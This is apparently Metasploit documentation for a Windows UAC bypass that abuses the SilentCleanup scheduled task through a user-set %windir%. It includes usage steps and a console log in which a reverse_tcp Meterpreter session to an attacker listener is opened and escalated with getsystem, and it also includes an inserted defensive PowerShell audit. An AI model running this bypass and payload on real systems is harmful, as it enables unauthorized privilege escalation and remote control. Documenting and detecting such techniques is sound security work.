## Introduction
This module bypasses UAC on any Windows installation that has PowerShell installed.

Windows Task Scheduler contains a task called "SilentCleanup" which, although it is configured to run as the Users group, automatically runs with elevated privileges. When it runs, it executes the file `%windir%\system32\cleanmgr.exe`. Because the task runs in the user's context and the user controls their own environment variables, `%windir%` (normally pointing to `C:\Windows`) can be redirected to any path of the user's choosing, and whatever it points to is then executed with administrative privileges. For the technique to work, the code must be saved in a script file somewhere; it cannot be run directly from a PowerShell prompt or from the Run dialog.
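The paragraph above describes the two conditions the module relies on: a scheduled task that runs elevated while resolving an unexpanded `%windir%`, and a user-scope environment variable that overrides it. The following PowerShell audit, added here as an example and not part of the Metasploit module or its documentation, checks a host for both conditions from a defender's side. It assumes the task lives under the `\Microsoft\Windows\DiskCleanup\` task path (not stated on the page) and that the `Get-ScheduledTask` cmdlet is available (Windows 8 / Server 2012 and later).

```powershell
# Added defensive audit for the SilentCleanup %windir% hijack; not part of the Metasploit module.
# Assumption: the task path is \Microsoft\Windows\DiskCleanup\ (the page does not state it).
$findings = @()

# 1. Confirm the task is still elevated and still launches its binary via an unexpanded %windir%.
$task = Get-ScheduledTask -TaskPath '\Microsoft\Windows\DiskCleanup\' -TaskName 'SilentCleanup' `
            -ErrorAction SilentlyContinue
if ($task) {
    $runLevel = $task.Principal.RunLevel
    $exe      = ($task.Actions | Select-Object -First 1).Execute
    if ($runLevel -eq 'Highest' -and $exe -match '%windir%') {
        $findings += "SilentCleanup has RunLevel=Highest and launches '$exe' through an unexpanded %windir%"
    }
}

# 2. A user-scope 'windir' value under HKCU\Environment shadows the machine-wide one for this
#    user's processes. There is no legitimate reason for it to exist, so its presence is an indicator.
$userEnv = Get-ItemProperty -Path 'HKCU:\Environment' -ErrorAction SilentlyContinue
if ($userEnv -and $userEnv.PSObject.Properties['windir']) {
    $findings += "User-scope override present: HKCU\Environment\windir = '$($userEnv.windir)'"
}

# 3. Check what %windir% currently expands to in this session against the expected system path.
$effective = [Environment]::ExpandEnvironmentVariables('%windir%')
$expected  = Join-Path $env:SystemDrive 'Windows'
if ($effective -ne $expected) {
    $findings += "Effective %windir% is '$effective', expected '$expected'"
}

if ($findings.Count -eq 0) {
    'OK: no SilentCleanup windir hijack indicators found'
} else {
    $findings | ForEach-Object { "FINDING: $_" }
}
```

Run it from a normal (non-elevated) session of the user being audited, since check 2 reads that user's own `HKCU` hive; check 3 only reflects variables that were present when the current process started, so a value written after logon is caught by check 2 rather than check 3. For continuous detection, the same indicator maps to a registry-value-set event on `HKCU\Environment\windir` in your endpoint telemetry.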
## Usage
- Create a session on the target system under the context of a local administrative user.
- Begin interacting with the module: `use exploit/windows/local/bypassuac_silentcleanup`.
- Set the `PAYLOAD` and configure it correctly, making sure the architecture is correct.
- If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: `set DisablePayloadHandler true`.
- Make sure that the `SESSION` value is set to the existing session identifier.
- Invoke the module: `run`.
## Scenarios
```
msf5 > sessions

Active sessions
===============

  Id  Name  Type                     Information                                 Connection
  --  ----  ----                     -----------                                 ----------
  6         meterpreter x86/windows  DESKTOP-T2TGIHP\Carter @ DESKTOP-T2TGIHP    192.168.1.x:4444 -> 192.168.1.x:53685 (192.168.1.x)

msf5 > use exploit/windows/local/bypassuac_silentcleanup
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/bypassuac_silentcleanup) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 192.168.1.xx
LHOST => 192.168.1.xx
msf5 exploit(windows/local/bypassuac_silentcleanup) > options

Module options (exploit/windows/local/bypassuac_silentcleanup):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   SESSION    6                yes       The session to run this module on.
   SLEEPTIME  0                no        The time (ms) to sleep before running SilentCleanup


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.55     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 exploit(windows/local/bypassuac_silentcleanup) > run

[*] Started reverse TCP handler on 192.168.1.xx:4444
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 192.168.1.x
[*] Meterpreter session 10 opened (192.168.1.xx:4444 -> 192.168.1.x:55538) at 2019-06-20 15:00:14 -0400

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > bg
[*] Backgrounding session 10...
msf5 exploit(windows/local/bypassuac_silentcleanup) >
```